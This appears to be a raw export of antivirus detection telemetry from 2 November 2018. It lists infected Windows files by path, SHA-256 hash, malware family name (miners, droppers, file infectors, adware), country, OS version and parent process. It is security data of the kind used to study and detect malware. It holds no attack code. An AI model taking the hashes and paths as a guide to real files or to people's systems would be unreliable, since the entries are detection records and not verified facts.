  Row(detection=Row(filename='usbintel.sys', filepath='\\\\nas-server\\public\\festplatte usb3\\hddrive2go (q)\\WINDOWS\\$ntservicepackuninstall$\\usbintel.sys', filesize=16000, name='TR/Patched.Ren.Gen2.#M300.#R100869'), hash='73b479f135402f32681565a9850d9138817f9a20dad6ec3af58daf16471240bc', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:HIXCYj228kiWgUCb.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T13:49:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='atheros_ar956x_wireless_network_adapter_10.0.0.313_win7_amd64.exe', filepath='\\\\?\\G:\\DRIVE RESTOR\\WIND7-64+\\Atheros_AR956x_Wireless_Network_Adapter_10.0.0.313_win7_amd64.exe', filesize=2048000, name='HEUR/AGEN.1009067.#M1.#R1'), hash='73be95465d13bff9c1a2cf0a9dd51838f688ddb46e6e1547c7d9a1ba645cf2f7', metadata=Row(cmdline=None, country='BH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:24:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='atheros_ar956x_wireless_network_adapter_10.0.0.313_win7_amd64.exe', filepath='G:\\DRIVE RESTOR\\WIND7-64+\\Atheros_AR956x_Wireless_Network_Adapter_10.0.0.313_win7_amd64.exe', filesize=2048000, name='HEUR/AGEN.1009067.#M1.#R1'), hash='73be95465d13bff9c1a2cf0a9dd51838f688ddb46e6e1547c7d9a1ba645cf2f7', metadata=Row(cmdline='0x84c', country='BH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\audiodg.exe', parentsize=None, timestamp='2018-11-02T06:35:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203638-32e6b95b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9194ec95\\AVSCAN-20181102-203344-1EB21306\\AVSCAN-20181102-203638-32E6B95B', filesize=1536000, name='TR/BitCoinMiner.pjgxk.#M1.#R1'), hash='74e02287cc36a0375824ecd2d74912d7be34c03a7fab4dcca8ed0ec38bef6eec', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:36:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203859-435b0c23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9194ec95\\AVSCAN-20181102-203344-1EB21306\\AVSCAN-20181102-203859-435B0C23', filesize=1536000, name='TR/BitCoinMiner.pjgxk.#M1.#R1'), hash='74e02287cc36a0375824ecd2d74912d7be34c03a7fab4dcca8ed0ec38bef6eec', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:39:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204453-6c68eb3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9194ec95\\AVSCAN-20181102-203344-1EB21306\\AVSCAN-20181102-204453-6C68EB3F', filesize=1536000, name='TR/BitCoinMiner.pjgxk.#M1.#R1'), hash='74e02287cc36a0375824ecd2d74912d7be34c03a7fab4dcca8ed0ec38bef6eec', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:44:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203740-3a220c5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9194ec95\\AVSCAN-20181102-203344-1EB21306\\AVSCAN-20181102-203740-3A220C5A', filesize=1536000, name='TR/BitCoinMiner.pjgxk.#M1.#R1'), hash='74e02287cc36a0375824ecd2d74912d7be34c03a7fab4dcca8ed0ec38bef6eec', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:37:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='$rc2mi91', filepath='C:\\$Recycle.Bin\\S-1-5-21-4263215575-3939616800-3868030206-1001\\$RC2MI91', filesize=320000, name='ADWARE/FileFinder.Gen7.#M300.#R603476'), hash='7502868e104aacb5e43d1b5a6a6342c9447e1ee224b943f92697be566487ebcf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T16:34:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-213609-225da0d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a87c2d3e\\AVSCAN-20181102-213451-189FEC6A\\AVSCAN-20181102-213609-225DA0D4', filesize=320000, name='ADWARE/FileFinder.Gen7.#M1.#R1'), hash='7502868e104aacb5e43d1b5a6a6342c9447e1ee224b943f92697be566487ebcf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:36:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='terrain.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL12\\TERRAIN\\TERRAIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='750c34f9be6045cc4de53da5f11c9c51333e35383a4c1360ea3ad4ec2904d804', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='humanplayer.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\humanplayer\\humanplayer.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='75afa9a82f394c1ae3b1bf27314a64a87bddd0cfd5f8a1508409ecd5a0cde3ba', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='textures.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\COMMON\\TEXTURES\\TEXTURES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='75afa9a82f394c1ae3b1bf27314a64a87bddd0cfd5f8a1508409ecd5a0cde3ba', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='computer.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\COMPUTER\\COMPUTER.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='75afa9a82f394c1ae3b1bf27314a64a87bddd0cfd5f8a1508409ecd5a0cde3ba', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='workpanel.exe', filepath='G:\\上環機-3\\軟式操作盤\\WorkPanel.exe', filesize=2560000, name='W32/Jadtre.K.#M1.#R1'), hash='75d6102ddffe6cbd11af718876170ce8e0937cff902d448324cb68b9a31dc45a', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:28:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='workpanel.exe', filepath='\\?\\G:\\上環機-3\\軟式操作盤\\WorkPanel.exe', filesize=2560000, name='W32/Jadtre.K.#M1.#R1'), hash='75d6102ddffe6cbd11af718876170ce8e0937cff902d448324cb68b9a31dc45a', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:31:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='75efa335d6e6fa39037e5b8d36cb2330a618cc2b15ad2485f6296517b8e2d9e2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\75EFA335D6E6FA39037E5B8D36CB2330A618CC2B15AD2485F6296517B8E2D9E2', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='75efa335d6e6fa39037e5b8d36cb2330a618cc2b15ad2485f6296517b8e2d9e2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:59:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='75efa335d6e6fa39037e5b8d36cb2330a618cc2b15ad2485f6296517b8e2d9e2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\75EFA335D6E6FA39037E5B8D36CB2330A618CC2B15AD2485F6296517B8E2D9E2', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='75efa335d6e6fa39037e5b8d36cb2330a618cc2b15ad2485f6296517b8e2d9e2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:39:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a6702363.exe', filepath='g:\\system volume information\\_restore{c748380e-fdee-4ba8-ac02-d3f7afc441fe}\\rp1689\\A6702363.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='761a47c48a643614c2922c5a7809c64dd06d7caaddc45e060ae9b684506688d1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102010-a04981a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102010-A04981A0', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mapdrive.exe', filepath='E:\\HBCD\\Programs\\MapDrive.exe', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081521-3be65faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081521-3BE65FAA', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-222445-b328a625', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-222356-ABC2D34B\\AVSCAN-20181102-222445-B328A625', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:24:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mapdrive.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\MapDrive.exe", filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mapdrive.exe', filepath='H:\\HBCD\\Programs\\MapDrive.exe', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='H:\\HBCD\\HBCDMENU.EXE', parentsize=17920, timestamp='2018-11-02T22:20:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082214-70a165ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082136-6BD8F9E6\\AVSCAN-20181102-082214-70A165CE', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a207e1fadccabccb2c9c6148c7580f0a.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_1683791883\\a207e1fadccabccb2c9c6148c7580f0a.smp', filesize=9000000, name='TR/Dropper.Gen.#M300.#R3322'), hash='761b6dbffbf78c0ad8c36d257d2e0a22ac461f21e933e50cbcd8953189562f14', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-02T23:51:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tlntsvr.exe', filepath='d:\\windows\\winsxs\\x86_microsoft-windows-telnet-server-tlntsvr_31bf3856ad364e35_6.1.7600.16385_none_be9afc7752263ea7\\tlntsvr.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='7661fdb33971bc69ef7679b353a481f6960feea22895f5cfe194e80c31483e63', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:08:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184034-4ede26e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a343d1e\\AVSCAN-20181102-184015-3EBD2D4A\\AVSCAN-20181102-184034-4EDE26E6', filesize=192000, name='TR/Confuser.766eaa.#M1.#R1'), hash='766eaace216cc2443cb5b9b17f55a05af178aeb134d0d8da4ea9eadcf542190f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:11:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='keygen.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\FastKeys.v4.13_p30download.com\\Keygen\\Keygen.exe', filesize=192000, name='HEUR/AGEN.1018957.#M1.#R1'), hash='766eaace216cc2443cb5b9b17f55a05af178aeb134d0d8da4ea9eadcf542190f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=280576, timestamp='2018-11-02T15:10:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='keygen.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\FastKeys.v4.13_p30download.com\\Keygen\\Keygen.exe', filesize=192000, name='HEUR/AGEN.1018957.#M1.#R1'), hash='766eaace216cc2443cb5b9b17f55a05af178aeb134d0d8da4ea9eadcf542190f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:10:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='keygen.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\FastKeys.v4.13_p30download.com\\Keygen\\Keygen.exe', filesize=192000, name='HEUR/AGEN.1018957.#M1.#R1'), hash='766eaace216cc2443cb5b9b17f55a05af178aeb134d0d8da4ea9eadcf542190f', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4528168, timestamp='2018-11-02T15:10:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='watermark.exe', filepath='C:\\Program Files\\Microsoft\\WaterMark.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='76713ebad8aaccef88cbe580ef0b1dc9c258ff0a21b4eb6680217469f0d1da33', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:10:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='watermark.exe', filepath='C:\\Program Files\\Microsoft\\WaterMark.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='76713ebad8aaccef88cbe580ef0b1dc9c258ff0a21b4eb6680217469f0d1da33', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:17:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='watermark.exe', filepath='\\\\?\\c:\\program files\\microsoft\\watermark.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='76713ebad8aaccef88cbe580ef0b1dc9c258ff0a21b4eb6680217469f0d1da33', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:29:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='watermark.exe', filepath='C:\\program files\\microsoft\\watermark.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='76713ebad8aaccef88cbe580ef0b1dc9c258ff0a21b4eb6680217469f0d1da33', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:32:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082548-df64fcc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-082548-DF64FCC3', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='7695db58a17aa32b3dd07463a56ea50078d361af3009b73794834bf53f13819a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:27:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start.exe', filepath='\\\\192.168.0.100\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\經營管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='76a84b3f9652d21a1a93f6578a3fff9714c697e125c87d859e58e40858015ae2', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1upUepgZNU2jR\\\\\\/+9.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:02:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150835-d5d02776', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d7ee450\\AVSCAN-20181102-150020-68824B89\\AVSCAN-20181102-150835-D5D02776', filesize=3520000, name='HEUR/AGEN.1004753.#M1.#R1'), hash='76d78fd29cb242c3013c375f10d7debda6f2294bec9dddbef02796360c8bd36b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T17:08:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150126-7701962a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d7ee450\\AVSCAN-20181102-150020-68824B89\\AVSCAN-20181102-150126-7701962A', filesize=3520000, name='HEUR/AGEN.1004753.#M1.#R1'), hash='76d78fd29cb242c3013c375f10d7debda6f2294bec9dddbef02796360c8bd36b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rossorabbitintrouble.exe', filepath='E:\\العاب\\جزرة الأرنوب\\RossoRabbitInTrouble.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='76ee4527b42e705ddd5a24dba7cb044d23dcdc20b51f8431f6071cff5bade2e3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T18:31:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='client.exe', filepath='C:\\ProgramData\\Client\\client.exe', filesize=9000000, name='TR/Dropper.Gen.#M2.#R3322'), hash='7745746bba7ce1690b27dad90b72ef32a5c403d83ddbdddda1ab39e26b3c0768', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='client.exe', filepath='C:\\ProgramData\\Client\\client.exe', filesize=9000000, name='TR/Dropper.Gen.#M2.#R3322'), hash='7745746bba7ce1690b27dad90b72ef32a5c403d83ddbdddda1ab39e26b3c0768', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~seb5ff.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~seB5FF.tmp', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='77970e54286c4b00c7dba400cfd62f3b70d859bb50e591c411aea0427d5f0507', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:04:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msouc.exe', filepath='C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\MSOUC.EXE', filesize=564000, name='W32/Sality.AT.#M1.#R1'), hash='77a1c6dc6bde606f8322220663496a4a3c060300e48210a7396a038351b301c3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:iL5kJYJ2NU6PJGn\\\\\\/.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:00:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\System32\\CastSrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:25:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:32:01Z'), dt=datetime.date(2018, 11, 2)),
